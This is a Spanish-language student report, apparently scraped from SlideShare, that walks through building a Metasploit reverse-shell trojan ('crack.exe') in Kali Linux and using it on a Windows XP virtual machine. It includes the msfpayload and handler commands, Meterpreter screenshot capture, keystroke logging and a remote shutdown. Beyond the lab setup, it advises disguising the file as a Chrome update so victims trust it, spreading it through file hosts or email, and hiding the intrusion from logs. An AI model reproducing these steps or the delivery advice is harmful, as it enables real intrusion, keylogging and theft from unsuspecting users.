SlideShare uma empresa Scribd logo
1 de 25
Baixar para ler offline
Pachuca Hgo. A 05 de Diciembre del 2013

Backdoor
Unidad 5

Materia: Seguridad en TI
Catedrático: Javier Hernández Orosco.
Alumna: Ana Karen Velasco Soto
N.C 09200867
Tabla de contenido
Introducción ........................................................................................................................................ 2
¿Qué es Kali Linux? .......................................................................................................................... 2
¿Qué es una Backdoor?................................................................................................................... 2
¿Qué es Metasploit? ....................................................................................................................... 2
Desarrollo ............................................................................................................................................ 3
Instalando kali linux… ...................................................................................................................... 3
Realizando el ataque ....................................................................................................................... 7
Conclusión ......................................................................................................................................... 23
Referencias ........................................................................................................................................ 24

Tabla de Ilustraciones
ILUSTRACIÓN 1 OBTENER DIRECCIÓN IP ....................................................................................................................... 7
ILUSTRACIÓN 2 RUTA PARA EL METSPLOIT .................................................................................................................... 8
ILUSTRACIÓN 3 RAÍZ ................................................................................................................................................ 9
ILUSTRACIÓN 4 MSFCONSOLE ..................................................................................................................................... 9
ILUSTRACIÓN 5 METASPLOIT INICIADO ....................................................................................................................... 10
ILUSTRACIÓN 6 UTILIZANDO LA IP............................................................................................................................. 11
ILUSTRACIÓN 7 CREANDO LA BACKDOOR .................................................................................................................... 12
ILUSTRACIÓN 8 EXITOSO ......................................................................................................................................... 12
ILUSTRACIÓN 9 VERIFICACIÓN DE CRACK.EXE............................................................................................................... 13
ILUSTRACIÓN 10 HANDLER ...................................................................................................................................... 13
ILUSTRACIÓN 11 SETEANDO EL BACKDOOR ................................................................................................................. 14
ILUSTRACIÓN 12 EXPLOIT EN MODO ESCUCHA ............................................................................................................. 15
ILUSTRACIÓN 13 MÁQUINA VIRTUAL CON XP SIN ANTIVIRUS.......................................................................................... 15
ILUSTRACIÓN 14 DESCARGA DE CRHOME.EXE .............................................................................................................. 16
ILUSTRACIÓN 15 VICTIMA GUARDADNO EL .EXE ........................................................................................................... 16
ILUSTRACIÓN 16 EJECUTANDO 1 .............................................................................................................................. 17
ILUSTRACIÓN 17 EJECUCION 2 ................................................................................................................................. 17
ILUSTRACIÓN 18 METERPRETER ............................................................................................................................... 18
ILUSTRACIÓN 19 COMANDO SCREENSHOT.................................................................................................................. 18
ILUSTRACIÓN 20 PANTALLA DE PC VICTIMA ................................................................................................................ 19
ILUSTRACIÓN 21 SCREENSHOT DE LA PANTALLA DEL OBJETIVO ........................................................................................ 19
ILUSTRACIÓN 22 COMANDO KEYSCAN_START ............................................................................................................. 20
ILUSTRACIÓN 23 KEYSCAN CORRIENDO ...................................................................................................................... 20
ILUSTRACIÓN 24 TEXTO COMPUTADORA VICTIMA ........................................................................................................ 21
ILUSTRACIÓN 25 SHUTDOWN .................................................................................................................................. 21
ILUSTRACIÓN 26 APAGANDO PC VICTIMA .................................................................................................................. 22

1
Introducción
El objetivo de este documento es llevar a cabo un ataque a una computadora vulnerable que este
dentro de la misma red, por un método sencillo y eficaz haciendo uso de las famosas backdoors y
de Kali Linux que trae las herramientas necesarias para la penetración.

¿Qué es Kali Linux?
Kali Linux es una distribución de Linux avanzada para pruebas de penetración y auditorías de
seguridad.
Kali es una completa re-construcción de BackTrack Linux desde la base hacia arriba, y se adhiere
completamente a los estándares de desarrollo de Debian. Toda la nueva infraestructura ha sido
puesta en el lugar, todas las herramientas fueron revisadas y fueron embaladas, y hemos cambiado
a Git para nuestro VCS. (Docs Kali, 2013).

¿Qué es una Backdoor?
Estos programas son diseñados para abrir una "puerta trasera" en nuestro sistema de modo tal de
permitir al creador del backdoor tener acceso al sistema y hacer lo que desee con él.
El objetivo es lograr una gran cantidad de computadoras infectadas para disponer de ellos
libremente hasta el punto de formar redes de botnets. (Segu-Info, 2013)
Los crackers suelen usar puertas traseras para asegurar el acceso remoto a una computadora,
intentando permanecer ocultos ante una posible inspección. Para instalar puertas traseras los
crackers pueden usar troyanos, gusanos u otros métodos.
Se ha afirmado, cada vez con mayor frecuencia, que los fabricantes de ordenadores preinstalan
puertas traseras en sus sistemas para facilitar soporte técnico a los clientes, pero no ha podido
comprobarse con seguridad. (Wikipedia, 2013)

¿Qué es Metasploit?
Es una herramienta de kali linux que proporciona información acerca de vulnerabilidades de
seguridad y ayuda en tests de penetración y en el desarrollo de firmas para sistemas de detección
de intrusos.

2
Desarrollo
Para realizar el ataque por una backdoor vamos a utilizar kali Linux y una máquina virtual de XP
para realizar la prueba, esta no debe tener antivirus o al menos no estar actualizado.

Instalando kali linux…
Seguir las siguientes pantallas en modo gráfico.

3
4
5
6
Realizando el ataque
Se abre una terminal en kali Linux.
Antes que otra cosa, vamos a conocer la dirección IP con el comando ip addr, se deja la terminal
abierta con la información mostrada, ya que se utilizara más adelante.

ip addr

Ilustración 1 Obtener dirección IP

7
Ahora sigamos la ruta que se muestra en la imagen:

Ilustración 2 Ruta para el Metsploit

Ahora vamos a esperar un poco a que se inicie el servicio. El servicio que se inicia es el servidor de
base de datos de Metasploit. Si al iniciarlo pide una contraseña, solo se ingresa la contraseña de la
cuenta
de
usuario
y
clic
en
aceptar,
las
veces
que
sea
necesario.

8
La pantalla que debe aparecer es la que aparece abajo, y significa que el servidor ya inicio, y
esperamos a que devuelva la raíz.

Ilustración 3 Raíz

Ahora vamos a iniciar lo que es la consola del Metasploit para poder trabajar con uno de los
diferentes sploits que existen. Para esto escribimos la línea msfconsole como se puede observar,
llevara más o menos de 2 a 3 minutos en correr la consola.

msfconsole

Ilustración 4 msfconsole

9
Después de la espera de aproximadamente unos 3 a 5 minutos debe aparecer una ventana como
la que se muestra. Esto indica que se ha iniciado el Metasploit.

Ilustración 5 Metasploit iniciado

Nota: Si ha ocurrido algún error o cosa extraña, se debe actualizar el Metasploit y las gemas de Ruby,
siguiendo la siguiente ruta en kali: Applications/Software Update y asegurarse de tener una
conexión a internet, la actualización empezara automáticamente.

Una vez con esto para realizar el ataque debemos generar un archivo ejecutable, que es el que nos
va a permitir tener el acceso al sistema que se va a atacar.
Se debe escribir lo siguiente que es la línea que generara el archivo .exe que será enviado a
nuestro objetivo.

msfpayload windows/meterpreter/reverse_ tcp LHOST=192.168.1.72 LPORT=4444 x >
crack.exe
Se da Enter.
La IP que aparece en la línea es de la tarjeta de Ethernet o inalámbrica, depende de que se esté
utilizando en el momento, la IP que utilizaras empezara la mayoría de veces con 192.0.0.0 ya que

10
estas conectado a internet y se asigna una IP pública. Al principio del documento fue lo primero que
se mostró la manera de conocer la IP así que solo se debe abrir la otra terminal y copiar la dirección.

Ilustración 6 Utilizando la IP

Nota: Para la IP debes considerar la forma en que tu router asigna las IPS, ya que si reinicias la
máquina virtual, automáticamente cargara otra IP y el archivo que se generó para accesar a la
víctima quedara inservible. Te recomiendo que la asignes estática antes de generar tú archivo con
la ip que tienes en pantalla. Revisa el siguiente link: http://www.ehowenespanol.com/asignardireccion-ip-estatica-linux-como_387011/

11
Iría quedando así en pantalla.

Ilustración 7 Creando la backdoor

La creación ha sido exitosa.

Ilustración 8 Exitoso

12
Se revisa la carpeta personal para ver el archivo crack.exe.

Ilustración 9 Verificación de crack.exe

Esperar a que regrese la raíz, para poder “setear” el ataque ósea configurarlo, escribiendo el
siguiente comando.

use exploit/multi/handler
Y debe aparecer la raíz del handler.

Ilustración 10 Handler

13
Set LHOST 192.168.1.72
Set LPORT 4444
Con esto se ha seteado el backdoor para poder lanzar el ataque

Ilustración 11 Seteando el backdoor

Algunos puntos que cabe aclarar, es que de preferencia la pc víctima no debe tener antivirus, o al
menos si lo tiene que no esté actualizado ya que al antivirus lo detecta inmediatamente.
El archivo crack.exe, puede ser modificado por un nombre más creíble para que la víctima confíe
en el ciegamente y podamos cumplir con el objetivo, se puede subir a servidores como MEGA,
Mediafire, 4shared, o mandarlo por correo para difundirlo.
Ahora a correr el exploit antes de mandar el archivo, esto para que el exploit quede escuchando
cualquier conexión nueva la detecte inmediatamente.

exploit

14
Ilustración 12 Exploit en modo escucha

Aquí vamos pasar el archivo crack.exe a la máquina virtual con XP que es totalmente vulnerable.

Ilustración 13 Máquina virtual con XP sin antivirus

Se puede ver como la PC victima descarga el archivo creyendo que es un .exe para actualizar su
google chrome y tranquilamente lo ejecuta y espera ver respuesta pero no la hay así que
normalmente el usuario busca otro archivo ejecutable para actualizar, pero ya se ha conseguido el

15
control sobre la máquina.

Ilustración 14 Descarga de crhome.exe

Ilustración 15 Victima guardando el .exe

16
Ilustración 16 Ejecutando 1

Ilustración 17 Ejecución 2

17
Ahora del lado del atacante aparece la consola del meterpreter, esta sale automáticamente
después de que la víctima ejecuto él .exe creado, en la consola se escriben los comandos para
realizar una intrusión más significativa.

Ilustración 18 Meterpreter

Para verificar la intrusión podemos sacar una impresión de pantalla, de la máquina.

screenshot

Ilustración 19 Comando Screenshot

18
Ilustración 20 Pantalla de PC victima

Esta es la imagen de la impresión de pantalla obtenida. Se encontrara en el home de kali Linux.

Ilustración 21 Screenshot de la pantalla del objetivo

19
También algo que puede ser interesante es el saber qué es lo que se escribe en el objetivo.
Vamos a inicializar el servicio.

keyscan_start

Ilustración 22 Comando keyscan_start

Ahora para lograr extraer todo lo que se tecleo en la pc víctima. Para que muestre las palabras y
acciones almacenadas en el buffer a la hora de escribir es:

keyscan_dump

Ilustración 23 Keyscan corriendo

20
Lo que se escribió.

Ilustración 24 Texto computadora victima

Si se desea detener el escaneo de teclas es con:

keyscan_stop
Y ahora! A apagar la computadora!

shutdown

Ilustración 25 Shutdown

21
Ilustración 26 Apagando PC victima

Notas finales: Esta práctica se ha realizado con una máquina virtual de XP que no tiene antivirus
alguno, no se sabe si también pueda funcionar en un Windows 7 vulnerable pero se puede hacer
la prueba para aprender, debe ser el mismo procedimiento.
Se debe estar conectado a la misma red, es un ataque en la red local, no un ataque remoto.

22
Conclusión
Con esto se puede concluir por el lado de la víctima que se debe tener un antivirus bien actualizado
para evitar ataques, también se debe verificar bien, en que sitios navegamos y descargamos
programas siempre hay que revisar que sean de páginas oficiales para evitar un engaño y así dar
acceso al equipo.
Por el lado del hacker, podría decirse que las backdoors son una forma de penetración casi infalible
en pcs que estén totalmente desprotegidas, ya que las ventajas que tiene este tipo de ataque son,
remover la evidencia de la entrada inicial de los logs del sistema, retener el acceso a la máquina y
para ocultarlo se añade un nuevo servicio y se le puede dar un nombre del cual no se sospeche o
mejor aún, utilizar un servicio que nuca se use, que este activado manualmente o totalmente.

23
Referencias
Bytechef. (03 de 12 de 2013). Obtenido de http://byteschef.com/es/instalar-kali-linux-envirtualbox-con-guest-additions/
Docs Kali. (05 de 12 de 2013). Obtenido de http://es.docs.kali.org/introduction-es/que-es-kalilinux
Docs Kali linux. (04 de 12 de 2013). Obtenido de http://es.docs.kali.org/category/installation-es
Hakin9. (05 de 12 de 2013). Obtenido de http://hakin9.org/kali-linux-see-whats-new-and-getadvanced-skills-with-hakin9s-tutorials/
kalilinux. (5 de 12 de 2013). Obtenido de http://kalilinux.foroactivo.com/t25-manual-nmap-parakali-linux-parte-1
Linuxlive. (1 de 12 de 2013). Obtenido de
http://www.linuxliveusb.com/en/help/faq/virtualization/154-unable-to-boot-please-usea-kernel-appropriate-for-your-cpu
Nyxbone. (06 de 12 de 2013). Obtenido de
http://www.nyxbone.com/metasploit/Meterpreter.html
OMHE. (04 de 12 de 2013). Obtenido de
http://www.2013.omhe.org/wOoPs/uploads/2013/01/OMHE11.pdf
RevistadeSeguridad. (1 de 12 de 2013). Obtenido de http://revista.seguridad.unam.mx/numero18/pruebas-de-penetraci%C3%B3n-para-principiantes-5-herramientas-para-empezar
Segu-Info. (02 de 12 de 2013). Obtenido de http://www.segu-info.com.ar/malware/backdoor.htm
Taringa. (1 de 12 de 2013). Obtenido de http://www.taringa.net/posts/linux/16545448/Kali-laHermana-de-Backtrack-Linux.html
Wikipedia. (03 de 12 de 2013). Obtenido de
http://es.wikipedia.org/wiki/Malware#Puertas_traseras_o_Backdoors
Youtube. (01 de 12 de 2013). Obtenido de http://www.youtube.com/watch?v=FJoquV-G-qQ

24

Mais conteúdo relacionado

Mais procurados

Seguridad y auditoria informatica, iso 17799
Seguridad y auditoria informatica, iso 17799Seguridad y auditoria informatica, iso 17799
Seguridad y auditoria informatica, iso 17799Iestp Instituto Superior
 
Ppt seguridad informática
Ppt seguridad informáticaPpt seguridad informática
Ppt seguridad informáticakaribdis05
 
Ciberseguridad riesgos y prevención
Ciberseguridad riesgos y prevenciónCiberseguridad riesgos y prevención
Ciberseguridad riesgos y prevenciónConrad Iriarte
 
Seguridad en los Sistemas Operativos
Seguridad en los Sistemas OperativosSeguridad en los Sistemas Operativos
Seguridad en los Sistemas OperativosNeyber Porras
 
Powerpoint dela seguridad y proteccion de los sistemas operativos
Powerpoint dela seguridad y proteccion de los sistemas operativosPowerpoint dela seguridad y proteccion de los sistemas operativos
Powerpoint dela seguridad y proteccion de los sistemas operativosAdriana Rodriguez
 
Seguridad fisica y logica
Seguridad fisica y logicaSeguridad fisica y logica
Seguridad fisica y logicaIng. LucioJAP
 
Estándares para los centros de computo
Estándares para los centros de computoEstándares para los centros de computo
Estándares para los centros de computoJessy Zuñiga
 
234632213 sistema-experto-para-el-diagnostico-de-fallas-de-computadora-pdf
234632213 sistema-experto-para-el-diagnostico-de-fallas-de-computadora-pdf234632213 sistema-experto-para-el-diagnostico-de-fallas-de-computadora-pdf
234632213 sistema-experto-para-el-diagnostico-de-fallas-de-computadora-pdfDiego Yacelga Ortiz
 
Seguridad de los Sistemas Operativos
Seguridad de los Sistemas OperativosSeguridad de los Sistemas Operativos
Seguridad de los Sistemas Operativossteevenjose
 
Evento vs Incidente de Seguridad de la Información
Evento vs Incidente de Seguridad de la InformaciónEvento vs Incidente de Seguridad de la Información
Evento vs Incidente de Seguridad de la InformaciónJ. Gustavo López
 
Security in Cyber-Physical Systems
Security in Cyber-Physical SystemsSecurity in Cyber-Physical Systems
Security in Cyber-Physical SystemsBob Marcus
 

Mais procurados (20)

Clústers Alta Disponibilidad
Clústers Alta DisponibilidadClústers Alta Disponibilidad
Clústers Alta Disponibilidad
 
Seguridad y auditoria informatica, iso 17799
Seguridad y auditoria informatica, iso 17799Seguridad y auditoria informatica, iso 17799
Seguridad y auditoria informatica, iso 17799
 
Ppt seguridad informática
Ppt seguridad informáticaPpt seguridad informática
Ppt seguridad informática
 
Ciberseguridad riesgos y prevención
Ciberseguridad riesgos y prevenciónCiberseguridad riesgos y prevención
Ciberseguridad riesgos y prevención
 
Seguridad en los Sistemas Operativos
Seguridad en los Sistemas OperativosSeguridad en los Sistemas Operativos
Seguridad en los Sistemas Operativos
 
Seguridad en redes
Seguridad en redesSeguridad en redes
Seguridad en redes
 
The Rise of Active Directory Exploits
The Rise of Active Directory ExploitsThe Rise of Active Directory Exploits
The Rise of Active Directory Exploits
 
Powerpoint dela seguridad y proteccion de los sistemas operativos
Powerpoint dela seguridad y proteccion de los sistemas operativosPowerpoint dela seguridad y proteccion de los sistemas operativos
Powerpoint dela seguridad y proteccion de los sistemas operativos
 
Gestion de Seguridad informatica
Gestion de Seguridad informaticaGestion de Seguridad informatica
Gestion de Seguridad informatica
 
Seguridad fisica y logica
Seguridad fisica y logicaSeguridad fisica y logica
Seguridad fisica y logica
 
Estándares para los centros de computo
Estándares para los centros de computoEstándares para los centros de computo
Estándares para los centros de computo
 
234632213 sistema-experto-para-el-diagnostico-de-fallas-de-computadora-pdf
234632213 sistema-experto-para-el-diagnostico-de-fallas-de-computadora-pdf234632213 sistema-experto-para-el-diagnostico-de-fallas-de-computadora-pdf
234632213 sistema-experto-para-el-diagnostico-de-fallas-de-computadora-pdf
 
Seguridad de los Sistemas Operativos
Seguridad de los Sistemas OperativosSeguridad de los Sistemas Operativos
Seguridad de los Sistemas Operativos
 
SGBD Sybase
SGBD SybaseSGBD Sybase
SGBD Sybase
 
Ciberseguridad en empresas
Ciberseguridad en empresasCiberseguridad en empresas
Ciberseguridad en empresas
 
Ciberseguridad
CiberseguridadCiberseguridad
Ciberseguridad
 
Evento vs Incidente de Seguridad de la Información
Evento vs Incidente de Seguridad de la InformaciónEvento vs Incidente de Seguridad de la Información
Evento vs Incidente de Seguridad de la Información
 
Security in Cyber-Physical Systems
Security in Cyber-Physical SystemsSecurity in Cyber-Physical Systems
Security in Cyber-Physical Systems
 
Cifrado
CifradoCifrado
Cifrado
 
Sistemas Expertos
Sistemas ExpertosSistemas Expertos
Sistemas Expertos
 

Destaque

Finding the back door to people’s hearts
Finding the back door to people’s heartsFinding the back door to people’s hearts
Finding the back door to people’s heartsThird Column Ministries
 
How to Backdoor Diffie-Hellman
How to Backdoor Diffie-HellmanHow to Backdoor Diffie-Hellman
How to Backdoor Diffie-HellmanDavid Wong
 
Introduction to trojans and backdoors
Introduction to trojans and backdoorsIntroduction to trojans and backdoors
Introduction to trojans and backdoorsjibinmanjooran
 
Java Database Connectivity
Java Database ConnectivityJava Database Connectivity
Java Database Connectivitybackdoor
 
Penetration testing & Ethical Hacking
Penetration testing & Ethical HackingPenetration testing & Ethical Hacking
Penetration testing & Ethical HackingS.E. CTS CERT-GOV-MD
 
Trojans and backdoors
Trojans and backdoorsTrojans and backdoors
Trojans and backdoorsGaurav Dalvi
 

Destaque (8)

Backdoor
BackdoorBackdoor
Backdoor
 
Finding the back door to people’s hearts
Finding the back door to people’s heartsFinding the back door to people’s hearts
Finding the back door to people’s hearts
 
How to Backdoor Diffie-Hellman
How to Backdoor Diffie-HellmanHow to Backdoor Diffie-Hellman
How to Backdoor Diffie-Hellman
 
BackDoors Seminar
BackDoors SeminarBackDoors Seminar
BackDoors Seminar
 
Introduction to trojans and backdoors
Introduction to trojans and backdoorsIntroduction to trojans and backdoors
Introduction to trojans and backdoors
 
Java Database Connectivity
Java Database ConnectivityJava Database Connectivity
Java Database Connectivity
 
Penetration testing & Ethical Hacking
Penetration testing & Ethical HackingPenetration testing & Ethical Hacking
Penetration testing & Ethical Hacking
 
Trojans and backdoors
Trojans and backdoorsTrojans and backdoors
Trojans and backdoors
 

Semelhante a Penetración con una Backdoor

Episodio de pentesting
Episodio de pentestingEpisodio de pentesting
Episodio de pentestingakencito
 
Memoria Pruebas de intrusion mediante Metasploit Framework
Memoria Pruebas de intrusion mediante Metasploit FrameworkMemoria Pruebas de intrusion mediante Metasploit Framework
Memoria Pruebas de intrusion mediante Metasploit FrameworkErlaitzParreoMuoz
 
Curso de hacking avanzado
Curso de hacking avanzadoCurso de hacking avanzado
Curso de hacking avanzadoYULI-CASTRO
 
Presentacion re y_des_09072003
Presentacion re y_des_09072003Presentacion re y_des_09072003
Presentacion re y_des_09072003Alonso Caballero
 
Seguridad_Informatica_KALI_LINUX.pdf
Seguridad_Informatica_KALI_LINUX.pdfSeguridad_Informatica_KALI_LINUX.pdf
Seguridad_Informatica_KALI_LINUX.pdfAmlcarCceres1
 
Actividad No. 1.14: Protección del servidor MySQL mediante filtrado de paquetes
Actividad No. 1.14: Protección del servidor MySQL mediante filtrado de paquetes Actividad No. 1.14: Protección del servidor MySQL mediante filtrado de paquetes
Actividad No. 1.14: Protección del servidor MySQL mediante filtrado de paquetes Francisco Medina
 
Kali linux guia español
Kali linux guia españolKali linux guia español
Kali linux guia españolIt-servicios
 
Kali linux guia español
Kali linux guia españolKali linux guia español
Kali linux guia españolKrls Avilez
 
IMPLEMENTACIÓN DE OPENVPN EN RED HAT 6.2
IMPLEMENTACIÓN DE OPENVPN EN RED HAT 6.2IMPLEMENTACIÓN DE OPENVPN EN RED HAT 6.2
IMPLEMENTACIÓN DE OPENVPN EN RED HAT 6.2camilaml
 
9700132 el-sendero-del-hacker
9700132 el-sendero-del-hacker9700132 el-sendero-del-hacker
9700132 el-sendero-del-hackerivanboss9930
 
El sendero del hacker
El sendero del hackerEl sendero del hacker
El sendero del hackernoc_313
 

Semelhante a Penetración con una Backdoor (20)

Present3
Present3Present3
Present3
 
Episodio de pentesting
Episodio de pentestingEpisodio de pentesting
Episodio de pentesting
 
Memoria Pruebas de intrusion mediante Metasploit Framework
Memoria Pruebas de intrusion mediante Metasploit FrameworkMemoria Pruebas de intrusion mediante Metasploit Framework
Memoria Pruebas de intrusion mediante Metasploit Framework
 
Informe ataque troyano OPTIX PRO
Informe ataque troyano OPTIX PRO Informe ataque troyano OPTIX PRO
Informe ataque troyano OPTIX PRO
 
Curso de hacking avanzado
Curso de hacking avanzadoCurso de hacking avanzado
Curso de hacking avanzado
 
Presentacion re y_des_09072003
Presentacion re y_des_09072003Presentacion re y_des_09072003
Presentacion re y_des_09072003
 
Seguridad_Informatica_KALI_LINUX.pdf
Seguridad_Informatica_KALI_LINUX.pdfSeguridad_Informatica_KALI_LINUX.pdf
Seguridad_Informatica_KALI_LINUX.pdf
 
Actividad No. 1.14: Protección del servidor MySQL mediante filtrado de paquetes
Actividad No. 1.14: Protección del servidor MySQL mediante filtrado de paquetes Actividad No. 1.14: Protección del servidor MySQL mediante filtrado de paquetes
Actividad No. 1.14: Protección del servidor MySQL mediante filtrado de paquetes
 
Dns spoofing kali linux
Dns spoofing kali linuxDns spoofing kali linux
Dns spoofing kali linux
 
Redes ,,,,
Redes ,,,,Redes ,,,,
Redes ,,,,
 
Cain y Abel
Cain y AbelCain y Abel
Cain y Abel
 
Kali linux guia español
Kali linux guia españolKali linux guia español
Kali linux guia español
 
Kali linux guia español
Kali linux guia españolKali linux guia español
Kali linux guia español
 
Kali linux guia español
Kali linux guia españolKali linux guia español
Kali linux guia español
 
Kali Linux
Kali LinuxKali Linux
Kali Linux
 
IMPLEMENTACIÓN DE OPENVPN EN RED HAT 6.2
IMPLEMENTACIÓN DE OPENVPN EN RED HAT 6.2IMPLEMENTACIÓN DE OPENVPN EN RED HAT 6.2
IMPLEMENTACIÓN DE OPENVPN EN RED HAT 6.2
 
Openvp non redhat
Openvp non redhatOpenvp non redhat
Openvp non redhat
 
Openvp non redhat
Openvp non redhatOpenvp non redhat
Openvp non redhat
 
9700132 el-sendero-del-hacker
9700132 el-sendero-del-hacker9700132 el-sendero-del-hacker
9700132 el-sendero-del-hacker
 
El sendero del hacker
El sendero del hackerEl sendero del hacker
El sendero del hacker
 

Último

c3.hu3.p1.p2.El ser humano y el sentido de su existencia.pptx
c3.hu3.p1.p2.El ser humano y el sentido de su existencia.pptxc3.hu3.p1.p2.El ser humano y el sentido de su existencia.pptx
c3.hu3.p1.p2.El ser humano y el sentido de su existencia.pptxMartín Ramírez
 
TEST DE RAVEN es un test conocido para la personalidad.pdf
TEST DE RAVEN es un test conocido para la personalidad.pdfTEST DE RAVEN es un test conocido para la personalidad.pdf
TEST DE RAVEN es un test conocido para la personalidad.pdfDannyTola1
 
VOLUMEN 1 COLECCION PRODUCCION BOVINA . SERIE SANIDAD ANIMAL
VOLUMEN 1 COLECCION PRODUCCION BOVINA . SERIE SANIDAD ANIMALVOLUMEN 1 COLECCION PRODUCCION BOVINA . SERIE SANIDAD ANIMAL
VOLUMEN 1 COLECCION PRODUCCION BOVINA . SERIE SANIDAD ANIMALEDUCCUniversidadCatl
 
Estrategia de Enseñanza y Aprendizaje.pdf
Estrategia de Enseñanza y Aprendizaje.pdfEstrategia de Enseñanza y Aprendizaje.pdf
Estrategia de Enseñanza y Aprendizaje.pdfromanmillans
 
Uses of simple past and time expressions
Uses of simple past and time expressionsUses of simple past and time expressions
Uses of simple past and time expressionsConsueloSantana3
 
Mapa Mental de estrategias de articulación de las areas curriculares.pdf
Mapa Mental de estrategias de articulación de las areas curriculares.pdfMapa Mental de estrategias de articulación de las areas curriculares.pdf
Mapa Mental de estrategias de articulación de las areas curriculares.pdfvictorbeltuce
 
c3.hu3.p1.p3.El ser humano como ser histórico.pptx
c3.hu3.p1.p3.El ser humano como ser histórico.pptxc3.hu3.p1.p3.El ser humano como ser histórico.pptx
c3.hu3.p1.p3.El ser humano como ser histórico.pptxMartín Ramírez
 
BIOLOGIA_banco de preguntas_editorial icfes examen de estado .pdf
BIOLOGIA_banco de preguntas_editorial icfes examen de estado .pdfBIOLOGIA_banco de preguntas_editorial icfes examen de estado .pdf
BIOLOGIA_banco de preguntas_editorial icfes examen de estado .pdfCESARMALAGA4
 
LINEAMIENTOS INICIO DEL AÑO LECTIVO 2024-2025.pptx
LINEAMIENTOS INICIO DEL AÑO LECTIVO 2024-2025.pptxLINEAMIENTOS INICIO DEL AÑO LECTIVO 2024-2025.pptx
LINEAMIENTOS INICIO DEL AÑO LECTIVO 2024-2025.pptxdanalikcruz2000
 
Tarea 5-Selección de herramientas digitales-Carol Eraso.pdf
Tarea 5-Selección de herramientas digitales-Carol Eraso.pdfTarea 5-Selección de herramientas digitales-Carol Eraso.pdf
Tarea 5-Selección de herramientas digitales-Carol Eraso.pdfCarol Andrea Eraso Guerrero
 
Fisiologia.Articular. 3 Kapandji.6a.Ed.pdf
Fisiologia.Articular. 3 Kapandji.6a.Ed.pdfFisiologia.Articular. 3 Kapandji.6a.Ed.pdf
Fisiologia.Articular. 3 Kapandji.6a.Ed.pdfcoloncopias5
 
Los Nueve Principios del Desempeño de la Sostenibilidad
Los Nueve Principios del Desempeño de la SostenibilidadLos Nueve Principios del Desempeño de la Sostenibilidad
Los Nueve Principios del Desempeño de la SostenibilidadJonathanCovena1
 
Estas son las escuelas y colegios que tendrán modalidad no presencial este lu...
Estas son las escuelas y colegios que tendrán modalidad no presencial este lu...Estas son las escuelas y colegios que tendrán modalidad no presencial este lu...
Estas son las escuelas y colegios que tendrán modalidad no presencial este lu...fcastellanos3
 
DECÁGOLO DEL GENERAL ELOY ALFARO DELGADO
DECÁGOLO DEL GENERAL ELOY ALFARO DELGADODECÁGOLO DEL GENERAL ELOY ALFARO DELGADO
DECÁGOLO DEL GENERAL ELOY ALFARO DELGADOJosé Luis Palma
 
LA ECUACIÓN DEL NÚMERO PI EN LOS JUEGOS OLÍMPICOS DE PARÍS.pdf
LA ECUACIÓN DEL NÚMERO PI EN LOS JUEGOS OLÍMPICOS DE PARÍS.pdfLA ECUACIÓN DEL NÚMERO PI EN LOS JUEGOS OLÍMPICOS DE PARÍS.pdf
LA ECUACIÓN DEL NÚMERO PI EN LOS JUEGOS OLÍMPICOS DE PARÍS.pdfJAVIER SOLIS NOYOLA
 
FICHA DE MONITOREO Y ACOMPAÑAMIENTO 2024 MINEDU
FICHA DE MONITOREO Y ACOMPAÑAMIENTO  2024 MINEDUFICHA DE MONITOREO Y ACOMPAÑAMIENTO  2024 MINEDU
FICHA DE MONITOREO Y ACOMPAÑAMIENTO 2024 MINEDUgustavorojas179704
 

Último (20)

c3.hu3.p1.p2.El ser humano y el sentido de su existencia.pptx
c3.hu3.p1.p2.El ser humano y el sentido de su existencia.pptxc3.hu3.p1.p2.El ser humano y el sentido de su existencia.pptx
c3.hu3.p1.p2.El ser humano y el sentido de su existencia.pptx
 
TEST DE RAVEN es un test conocido para la personalidad.pdf
TEST DE RAVEN es un test conocido para la personalidad.pdfTEST DE RAVEN es un test conocido para la personalidad.pdf
TEST DE RAVEN es un test conocido para la personalidad.pdf
 
VOLUMEN 1 COLECCION PRODUCCION BOVINA . SERIE SANIDAD ANIMAL
VOLUMEN 1 COLECCION PRODUCCION BOVINA . SERIE SANIDAD ANIMALVOLUMEN 1 COLECCION PRODUCCION BOVINA . SERIE SANIDAD ANIMAL
VOLUMEN 1 COLECCION PRODUCCION BOVINA . SERIE SANIDAD ANIMAL
 
Estrategia de Enseñanza y Aprendizaje.pdf
Estrategia de Enseñanza y Aprendizaje.pdfEstrategia de Enseñanza y Aprendizaje.pdf
Estrategia de Enseñanza y Aprendizaje.pdf
 
Uses of simple past and time expressions
Uses of simple past and time expressionsUses of simple past and time expressions
Uses of simple past and time expressions
 
Mapa Mental de estrategias de articulación de las areas curriculares.pdf
Mapa Mental de estrategias de articulación de las areas curriculares.pdfMapa Mental de estrategias de articulación de las areas curriculares.pdf
Mapa Mental de estrategias de articulación de las areas curriculares.pdf
 
c3.hu3.p1.p3.El ser humano como ser histórico.pptx
c3.hu3.p1.p3.El ser humano como ser histórico.pptxc3.hu3.p1.p3.El ser humano como ser histórico.pptx
c3.hu3.p1.p3.El ser humano como ser histórico.pptx
 
BIOLOGIA_banco de preguntas_editorial icfes examen de estado .pdf
BIOLOGIA_banco de preguntas_editorial icfes examen de estado .pdfBIOLOGIA_banco de preguntas_editorial icfes examen de estado .pdf
BIOLOGIA_banco de preguntas_editorial icfes examen de estado .pdf
 
TL/CNL – 2.ª FASE .
TL/CNL – 2.ª FASE                       .TL/CNL – 2.ª FASE                       .
TL/CNL – 2.ª FASE .
 
Earth Day Everyday 2024 54th anniversary
Earth Day Everyday 2024 54th anniversaryEarth Day Everyday 2024 54th anniversary
Earth Day Everyday 2024 54th anniversary
 
Tema 7.- E-COMMERCE SISTEMAS DE INFORMACION.pdf
Tema 7.- E-COMMERCE SISTEMAS DE INFORMACION.pdfTema 7.- E-COMMERCE SISTEMAS DE INFORMACION.pdf
Tema 7.- E-COMMERCE SISTEMAS DE INFORMACION.pdf
 
LINEAMIENTOS INICIO DEL AÑO LECTIVO 2024-2025.pptx
LINEAMIENTOS INICIO DEL AÑO LECTIVO 2024-2025.pptxLINEAMIENTOS INICIO DEL AÑO LECTIVO 2024-2025.pptx
LINEAMIENTOS INICIO DEL AÑO LECTIVO 2024-2025.pptx
 
VISITA À PROTEÇÃO CIVIL _
VISITA À PROTEÇÃO CIVIL                  _VISITA À PROTEÇÃO CIVIL                  _
VISITA À PROTEÇÃO CIVIL _
 
Tarea 5-Selección de herramientas digitales-Carol Eraso.pdf
Tarea 5-Selección de herramientas digitales-Carol Eraso.pdfTarea 5-Selección de herramientas digitales-Carol Eraso.pdf
Tarea 5-Selección de herramientas digitales-Carol Eraso.pdf
 
Fisiologia.Articular. 3 Kapandji.6a.Ed.pdf
